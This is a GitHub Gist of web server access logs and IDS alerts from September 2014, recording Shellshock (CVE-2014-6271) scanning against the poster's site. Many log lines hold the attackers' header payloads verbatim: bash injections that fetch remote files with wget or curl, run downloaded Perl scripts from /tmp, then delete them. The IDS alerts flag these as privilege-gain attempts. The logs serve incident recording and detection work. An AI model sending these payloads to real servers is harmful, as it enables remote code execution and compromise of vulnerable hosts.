Last active
August 29, 2015 14:07
-
-
Save Oneiroi/6a89d8957077f45ce18f to your computer and use it in GitHub Desktop.
shellshock_logs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:09 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:11 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:13 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:13 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; /usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:14 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" | |
62.210.75.170 - - [29/Sep/2014:16:12:15 +0000] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 178 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null'" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
209.126.230.72 - - [25/Sep/2014:02:03:16 +0000] "GET / HTTP/1.0" 793 0 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" | |
166.78.61.142 - - [25/Sep/2014:11:33:48 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444" | |
93.103.21.231 - - [26/Sep/2014:00:37:45 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://oneiroi.co.uk/'" | |
91.200.84.22 - - [26/Sep/2014:08:36:58 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=oneiroi.co.uk -O /tmp/a.pl\x22" | |
146.71.113.194 - - [26/Sep/2014:09:12:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22" | |
94.102.60.177 - - [26/Sep/2014:14:09:31 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 301 178 "-" "() { x;};echo;echo 123456ololo | md5sum" | |
66.186.2.175 - - [26/Sep/2014:20:45:38 +0000] "GET /test HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
66.186.2.175 - - [26/Sep/2014:20:45:38 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET / HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
66.186.2.175 - - [26/Sep/2014:21:17:41 +0000] "GET /test HTTP/1.0" 793 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" | |
83.166.234.133 - - [27/Sep/2014:03:13:23 +0000] "GET / HTTP/1.0" 301 178 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://oneiroi.co.uk/\x22" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.189721","event_type":"alert","src_ip":"62.210.75.170","src_port":52020,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:11:59.680682","event_type":"alert","src_ip":"62.210.75.170","src_port":52166,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:09.629884","event_type":"alert","src_ip":"62.210.75.170","src_port":54004,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:11.188946","event_type":"alert","src_ip":"62.210.75.170","src_port":54430,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.026106","event_type":"alert","src_ip":"62.210.75.170","src_port":54797,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:13.984035","event_type":"alert","src_ip":"62.210.75.170","src_port":54961,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.088544","event_type":"alert","src_ip":"62.210.75.170","src_port":54976,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.182222","event_type":"alert","src_ip":"62.210.75.170","src_port":54989,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.276438","event_type":"alert","src_ip":"62.210.75.170","src_port":55017,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.399965","event_type":"alert","src_ip":"62.210.75.170","src_port":55029,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.511924","event_type":"alert","src_ip":"62.210.75.170","src_port":55058,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.612051","event_type":"alert","src_ip":"62.210.75.170","src_port":55091,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.732184","event_type":"alert","src_ip":"62.210.75.170","src_port":55130,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
